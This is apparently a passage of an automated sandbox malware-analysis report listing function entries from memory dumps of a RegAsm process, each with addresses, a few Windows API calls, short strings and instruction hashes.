Instruction ID: 77256de9afae28f361ac96676903be804c056801f3afaccc7b2fa8d95dd93940
Opcode Fuzzy Hash: 5d48038faf72bd1a615df370addbcabab54a835dd9f65c8cb5c9f25c0fb345e6
Instruction Fuzzy Hash: 3D411472E143598FCB04DFB9D8446EEBBF5BF88220F14856BD809A7341EB749845CB90

Function 067FD4F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067FD602

Memory Dump Source

Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 118f6ebd43bd8056ebbf8b79586506c98e6a85fc8d72092360bb23b1ce59dbdd
Instruction ID: c4bb2e31efff822e6eb59a1434010a4fdc6c2a294ae1997345193caf5f5ec35f
Opcode Fuzzy Hash: 118f6ebd43bd8056ebbf8b79586506c98e6a85fc8d72092360bb23b1ce59dbdd
Instruction Fuzzy Hash: 9941CFB1D10349DFDB24CF99C984ADEBBB5FF48314F24812AE918AB210D7709985CF90

Function 067FE46C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 067FFCF1

Memory Dump Source

Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 43e4849d4e62b5ea0e9f1abc5414a01201f552074056aa0f4ac026776dbe6abb
Instruction ID: db2e3e350a0a2baed6ab74f785dd75eedeace7b8d6d9c0361b32509f3d053984
Opcode Fuzzy Hash: 43e4849d4e62b5ea0e9f1abc5414a01201f552074056aa0f4ac026776dbe6abb
Instruction Fuzzy Hash: 21415CB4910355CFDB54CF99C848EAABBF5FF88314F25C859E619AB320D774A841CBA0

Function 0597D1D4 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0597E5D2), ref: 0597E6BF

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 9bc213d780887b40bfc7c46a92b6c98a0f54183541e031bedd3762872f40d5fa
Instruction ID: 3eb6ffc4d159bdc69002f1b9b14946981454c16c3104be5d5e518aabfc374310
Opcode Fuzzy Hash: 9bc213d780887b40bfc7c46a92b6c98a0f54183541e031bedd3762872f40d5fa
Instruction Fuzzy Hash: 6A1153B1C006599BCB10CFAAC444B9EFBF8FB08324F14816AD818A7200D378A904CFA5

Function 010F3E7E Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

\V]m, xrefs: 010F40D3

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID: \V]m
API String ID: 0-4105700344
Opcode ID: edac4fb22bccc30d93ca95b40728e2f0c9e15e1de7042a4b51f1df84a926c0d8
Instruction ID: 135ecce23541db921080293f15d9e2613047bc697ea038358aa19209307e3eab
Opcode Fuzzy Hash: edac4fb22bccc30d93ca95b40728e2f0c9e15e1de7042a4b51f1df84a926c0d8
Instruction Fuzzy Hash: 0E914AB0E002099FDB54CFA8C9867DEBBF1BF58314F148129E954EB694EB749849CB81

Function 010F6EE8 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

LRtq, xrefs: 010F6F1E

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID: LRtq
API String ID: 0-4092542751
Opcode ID: e4f5f4bbb121ce75280aa1765b38b9b62c8321ec656741f7de912cab9e1c0b10
Instruction ID: a3615e642ed07abbb87c354dfcaa4db745b77673d8f353ca79e0c9c822f847dc
Opcode Fuzzy Hash: e4f5f4bbb121ce75280aa1765b38b9b62c8321ec656741f7de912cab9e1c0b10
Instruction Fuzzy Hash: 04518C34700215CFDB05EB68C459AAD7BF2BF88700F2040ADE646EB7A5DB769C41CBA1

Function 010F7D98 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

LRtq, xrefs: 010F7E19

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID: LRtq
API String ID: 0-4092542751
Opcode ID: a5f498f6e2a4cf2d9c529a4ab4c7acd335877389c0204e3264e694600365ee7b
Instruction ID: 5fadfc240162e04ff809d22def27609f3236a105970852beb98cb3d9bde42660
Opcode Fuzzy Hash: a5f498f6e2a4cf2d9c529a4ab4c7acd335877389c0204e3264e694600365ee7b
Instruction Fuzzy Hash: A7319430E10219CBDB55CF69C44679EB7F1EF89300F60845AEA41EB351DB719C41CB52

Function 010F7DA8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

LRtq, xrefs: 010F7E19

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID: LRtq
API String ID: 0-4092542751
Opcode ID: 1c8ba58e71062a6629f4bfa8707503c810491bdf5e3b75c7f2e45ac4a6effcc7
Instruction ID: d2554abb8f7b68d7b3920898467a3e32f2bd23408e732bf0cc6e8775475b85c4
Opcode Fuzzy Hash: 1c8ba58e71062a6629f4bfa8707503c810491bdf5e3b75c7f2e45ac4a6effcc7
Instruction Fuzzy Hash: 4E317031E10209CBDB55CFA9C4457EEB7F2EF89310F50856AEA46EB640EB70AD41CB91

Function 010F6BB0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

LRtq, xrefs: 010F6BE7

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID: LRtq
API String ID: 0-4092542751
Opcode ID: 65d2e610b51e9fc31f757e72b348d4d52ca28ce1b8772fd8b27af230b6be102d
Instruction ID: fc007c64246d64dae28014868b31d8f13002fa94581ec5ae5f14593da22054b9
Opcode Fuzzy Hash: 65d2e610b51e9fc31f757e72b348d4d52ca28ce1b8772fd8b27af230b6be102d
Instruction Fuzzy Hash: 4801F5717186518FC704E778D4627AD7BA2EFCA310F50C46AD049CB780DE768842CB91

Function 010F8739 Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc48e54b42daa875223513b5bd7680f736c0b10ffc09d15265ef4671d2b87f5b
Instruction ID: 60c97d5504aa7b0e4e0791e90c845e552e9a91b3f082a802492e641396a5fdf5
Opcode Fuzzy Hash: cc48e54b42daa875223513b5bd7680f736c0b10ffc09d15265ef4671d2b87f5b
Instruction Fuzzy Hash: 7C1280707002068BDB15AB39E4A925C77E2FBC9314F108A2AE586CF345DF35EC979B91

Function 010F8748 Relevance: .6, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c69d0ca9953611768692902f796b487c26df5f9624972f7572fed552abb0e95
Instruction ID: 5f3462d9b20df92e18b5cec3eb4e986590c0263aed40be072b194478ac8d1b98
Opcode Fuzzy Hash: 8c69d0ca9953611768692902f796b487c26df5f9624972f7572fed552abb0e95
Instruction Fuzzy Hash: 91128F707002068BDB15AB39E4A925C77E2FBC9314F508A2AE582CF345DF35EC979B91

Function 010F4A96 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ef824e3844de472de5e0e66e4c41422322f5bc07b11a2adc5d9c26d9544e4d
Instruction ID: 0b0b1fbfefd732a61af5d792124608907ae99845035487383ef041c08072689f
Opcode Fuzzy Hash: 59ef824e3844de472de5e0e66e4c41422322f5bc07b11a2adc5d9c26d9544e4d
Instruction Fuzzy Hash: 72A16A70E0020E8FDB54CFA8D8827DEBBF1AF88314F14856DD994E7694EB749885CB81

Function 010FA1C2 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65c8b0c2188cc58103d4e886609a9197023378f9b8c37cfa01c505655d9408a
Instruction ID: 23aa849755f3eb0fefe7f89ca1edc277337c679b94824b1fdda8ec896f0a8fd0
Opcode Fuzzy Hash: a65c8b0c2188cc58103d4e886609a9197023378f9b8c37cfa01c505655d9408a
Instruction Fuzzy Hash: D6A16D34B00215CFDB55DFA8D885AADBBF2EF88350F148568E94AAB751DE30EC42CB40

Function 010FA6D8 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3cab53af879c2e724ba35df2ddf223bda39d8d9fa87b18cb9f6b36a9f32876
Instruction ID: 055524a6d87797a1f6392170237bee6e8b9c4b28b940c77cf97e2ffbcc04b206
Opcode Fuzzy Hash: 8d3cab53af879c2e724ba35df2ddf223bda39d8d9fa87b18cb9f6b36a9f32876
Instruction Fuzzy Hash: C7717B71A00205DFDB44DF69D885B9DBBF5FF88310F14C1A9EA09AB395EB719841CB90

Function 010FA510 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7967e85df9376ffbcc6f308cdf4783df3e509f5cb47a1e9290fd9149426b337
Instruction ID: 56fd9b14b2eb61f4774ed9b6821b32a147a93d11947846395d22ef5d928b8a18
Opcode Fuzzy Hash: d7967e85df9376ffbcc6f308cdf4783df3e509f5cb47a1e9290fd9149426b337
Instruction Fuzzy Hash: F841D170B00206CFDF65DA6CC98176E77B5EB89310F20496AEA4ADB742D735DC818B91

Function 010F6CEE Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b3be48357d91faf9824ee2a2944b82d4499f1b64e59330e92e4bfaaad460cf
Instruction ID: c14204bdccb7862604cede398b43919083dd17b767c25c7484d4840516ede3d6
Opcode Fuzzy Hash: 59b3be48357d91faf9824ee2a2944b82d4499f1b64e59330e92e4bfaaad460cf
Instruction Fuzzy Hash: 615113B1D102188FDB18CFA9C886B9DBBF1BF48310F14856DE959BB791CB75A844CB50

Function 010F1108 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea6986e87c4fe59e8d5b8a33d7ab3b085860297d828e1f8b8c8984f790d5678f
Instruction ID: 2131bd108a07df352e7cea8af26584e4e951ae71ebd38d503ac3b0bbb81c3c11
Opcode Fuzzy Hash: ea6986e87c4fe59e8d5b8a33d7ab3b085860297d828e1f8b8c8984f790d5678f
Instruction Fuzzy Hash: B1514E701112638FCB16EF7BF994A543FA1FB563087048B55E1458B27EE63A78C6CB81

Function 010F6CF8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe392da66b8a1fe606435edc72f62bf1b918267992d3ce0225109b6c52f155b
Instruction ID: 58b6fb9f3455a5a70e2648836c1d469bc2b711490b14ea3317404574f60bf87d
Opcode Fuzzy Hash: 2fe392da66b8a1fe606435edc72f62bf1b918267992d3ce0225109b6c52f155b
Instruction Fuzzy Hash: 7B5121B1D102188FDB18CFA9C885B9EBBF1BF48310F14852DE959BB791CB75A844CB90

Function 010FA502 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae3d601525c56dbe6ca584e1e929c4dacbfa3334b7fbd7ecaaf2bd704d61203
Instruction ID: d47ad9acbeac160c1eed06f818c21a6889c1e4d7dce442a93eaaf693de9b2a6c
Opcode Fuzzy Hash: 2ae3d601525c56dbe6ca584e1e929c4dacbfa3334b7fbd7ecaaf2bd704d61203
Instruction Fuzzy Hash: 4D41F070B00106CBDF61DA6CC58176E77B5EB8D310F20496AEA4ADB741D735DC818B81

Function 010F1138 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7cc97a582f8d56054a5a5cc4882fe8d10ed6e07ad8f64fc1c65446fca63625
Instruction ID: e2e60571fbb5afbbc3a97f0785a5072c1f08c88c84a8fb3502a7d9f3e1d5e68c
Opcode Fuzzy Hash: 9b7cc97a582f8d56054a5a5cc4882fe8d10ed6e07ad8f64fc1c65446fca63625
Instruction Fuzzy Hash: C351E9702112638FCB1AFF7BF9949543BA1F7553083048B15E2458B27EEA7A79C6CB81

Function 010F26E4 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5c86c474721210d9817e402cc5d8dcf4ac18b69a946b0f486d7374fe4e6e7e7
Instruction ID: b73f323221703cd8a47b1b778d2df6bcd3d6067253e4ef936c972b28af1cbcd7
Opcode Fuzzy Hash: f5c86c474721210d9817e402cc5d8dcf4ac18b69a946b0f486d7374fe4e6e7e7
Instruction Fuzzy Hash: 8B41EDB0D002499FDB14CFA9C985A9EBFF5BF48314F148429E909AB250DB75A946CB90

Function 010F26F0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f332a7f1d2807fb77d5c3eb01c095f3e8f5ba83189bbbad24fbd3e56c55e6305
Instruction ID: 464909d925f4b411a359e7fb4931742fa71e5e334410acf16aad5282a7ba511e
Opcode Fuzzy Hash: f332a7f1d2807fb77d5c3eb01c095f3e8f5ba83189bbbad24fbd3e56c55e6305
Instruction Fuzzy Hash: FA41EDB0D00349DFDB10CFA9C985A9EBFF5FF48314F148429E909AB250DB75A946CB90

Function 010FA080 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad9cde6d75156ab89693aec2e833c1e76769d8b0513dd33c7d186371fb6741c
Instruction ID: 7cd7592e830d707246480e96a7e6b1e7f3f4eb60f91c4747709fb6d2c6804bc8
Opcode Fuzzy Hash: 3ad9cde6d75156ab89693aec2e833c1e76769d8b0513dd33c7d186371fb6741c
Instruction Fuzzy Hash: B1319F30A0020ADBCB09CF65D89169EFBB2BF89340F10C619E905AB741EB709842CB40

Function 010FA090 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30eb9745a9424f921912c48978e5665135355abe2903b15e613c9c87747508c1
Instruction ID: 394e7554a96cdfbd76dc820f951a53575c5666a41a1b85190e0add5c1325c8c0
Opcode Fuzzy Hash: 30eb9745a9424f921912c48978e5665135355abe2903b15e613c9c87747508c1
Instruction Fuzzy Hash: 8B218070E0020ADBDB09DF69D89169EF7B2FF89340F10C619E909EB741DB719882CB50

Function 010F4F90 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f773710d1129d3e03d792ad02881f118d85ee6e8e920c18b9a0f36d53f75de1
Instruction ID: 3c5bd61826f1ce0caa29549636fc4c233fb514972e25dfaff15ee6d8fedeb435
Opcode Fuzzy Hash: 2f773710d1129d3e03d792ad02881f118d85ee6e8e920c18b9a0f36d53f75de1
Instruction Fuzzy Hash: 33214834600609CFDB54EB38D959A9E7BF1EF89304F1004A8F646EB365EB36AC41CB91

Function 010F16A8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36d4516656648e2d92b1765b643a6e20e4a7eb3b405b3f669b737ef7d4788f56
Instruction ID: ed95b3e9617074b1c89cf14c332518ef4cec6eb91757e2718c9e9897b66b8615
Opcode Fuzzy Hash: 36d4516656648e2d92b1765b643a6e20e4a7eb3b405b3f669b737ef7d4788f56
Instruction Fuzzy Hash: 91210A746101118BDF66FB7EF88575937A2FB48308F104E69E10ACB6A5EA35D8C4CB41

Function 010F1880 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e91bd75c0b57f27b115fa0eba32178804e0916e0c5598d47b9f0a820375cb96
Instruction ID: 8bb8e902b6c08515b67dced3f47e217645012515d09777d83e7116bedc5d63ca
Opcode Fuzzy Hash: 6e91bd75c0b57f27b115fa0eba32178804e0916e0c5598d47b9f0a820375cb96
Instruction Fuzzy Hash: 2421A930B04216CFDB64EB78C6567AE77F2AF49200F1004ADD246EB790DB769C41CBA4

Function 010F9F80 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29d20cae1fcaa0d339b6e73ee4ae23661595f2a89b91bfdc00208d0cf54e34ff
Instruction ID: 9a9b75d59705c190b9fcc7ee109f5804c3675f3b7a882b4728d2e5b435f1a9c1
Opcode Fuzzy Hash: 29d20cae1fcaa0d339b6e73ee4ae23661595f2a89b91bfdc00208d0cf54e34ff
Instruction Fuzzy Hash: E7218E31E00616DBCB09CFA4D4426EEB7B2BF89310F10862AF915FB640DB71A846CB50

Function 0109D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4154716374.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_109d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 173c7c623f13c8adae6a030303b5ef9f19a9027887144e855c20afb0689e0cda
Instruction ID: e34c1912fad69021b6121bc64292d4886a327773c042906f98b08e0a41dd3b19
Opcode Fuzzy Hash: 173c7c623f13c8adae6a030303b5ef9f19a9027887144e855c20afb0689e0cda
Instruction Fuzzy Hash: 6F2100B1544240DFDF11DF98D990B26BBA5EB88314F24C9AEE9894B242C33AD446DB62

Function 010F1382 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 152bea5bff499057df8845e791f3e3d7bbdfb5793ef8d58dbded5dcc76b69f26
Instruction ID: 17762fbd842c31564a1e163197e15a9ea2df8b431e91de75bfd72b89ab83e114
Opcode Fuzzy Hash: 152bea5bff499057df8845e791f3e3d7bbdfb5793ef8d58dbded5dcc76b69f26
Instruction Fuzzy Hash: 6921D270600111CBEF76676DE18A32C3A96EB82314F40096EF686DBFC1DE79D8C68742

Function 010F1890 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f7120d543a60d25a8657750794be38768e8b690d0c9e01f52fb4ea133684cf
Instruction ID: dbd0986067b0d06749086a7262d13fbc1a23449ccc1f8ca06e434a51cf89ff4a
Opcode Fuzzy Hash: 31f7120d543a60d25a8657750794be38768e8b690d0c9e01f52fb4ea133684cf
Instruction Fuzzy Hash: 56217F30B04219CFDB58EB78C6157AE77F2AF89200F1004ADD246EB794DB369D41CBA5

Function 010F9F90 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71783efdcabd766da5b0481bedac4ce4fb2b1d791473a9553a54d5da84fea67
Instruction ID: 397e41b014aa0df45649aa439ef0ca642bb7577d6a189aa6a35cb6c064ae84ac
Opcode Fuzzy Hash: c71783efdcabd766da5b0481bedac4ce4fb2b1d791473a9553a54d5da84fea67
Instruction Fuzzy Hash: 9F214F30E0061ADBCB19CFA9D451AEEB7B2AF89350F10861AF955FB640DB71A845CB50

Function 010F16B8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcf1e31e6dc16e4ff8545541ca45c88087ea8541e8bce68d02971319c83028a9
Instruction ID: 877706b589e5a142a8b4805dc07539546e0a8cbdbb04f94dbad754445ec89553
Opcode Fuzzy Hash: dcf1e31e6dc16e4ff8545541ca45c88087ea8541e8bce68d02971319c83028a9
Instruction Fuzzy Hash: DA2108742101118FCF56EB7EF88575D37A6FB49308F104A69E10ACB6A6EA35DCC08B81

Function 010F4FA0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d9f3f705b831d7df20e9f478d2099aca5e9dbdc3cf1483b7281f0f69fb3f1e
Instruction ID: 757a60a40aafb54ebca91205f0cec6773b79343cc2229e3a02010ccbd8fb098a
Opcode Fuzzy Hash: 23d9f3f705b831d7df20e9f478d2099aca5e9dbdc3cf1483b7281f0f69fb3f1e
Instruction Fuzzy Hash: A0211934700609CFDB54EB78C959AAE77F1EB49304F1004A8F646EB365EB369D40CB91

Function 010F17C8 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc5e1683d669ff4f1f3e607e5987b21123c3dc31c57dc87f5e95f73812882a7
Instruction ID: 3491406b41593107bc3cf4be3c348419ea33997edfd046f4daded68ec20ec728
Opcode Fuzzy Hash: 8fc5e1683d669ff4f1f3e607e5987b21123c3dc31c57dc87f5e95f73812882a7
Instruction Fuzzy Hash: 85112375B10222DFCF14AB75984A69E7FF6FB48650F104429EB4ADB344EA39C843C780

Function 010F0838 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec501b5519e82e246f3d44fecbc3ad84f07a575dfe2702af0e317c760d82fb81
Instruction ID: a53e6a7e6dc492e7dbcc86d4dea063b388e4818268eba5573da8509155d4fb57
Opcode Fuzzy Hash: ec501b5519e82e246f3d44fecbc3ad84f07a575dfe2702af0e317c760d82fb81
Instruction Fuzzy Hash: 9C11C430B011549BEFA25ABDE40636937D2EB41314F1049BEF6C2CB68BEA65D8824BC1

Function 010F0848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d04d9cee5199b25b07f22ab044a8ff4dfd09b0d572c42733a83b04a59c95b1ee
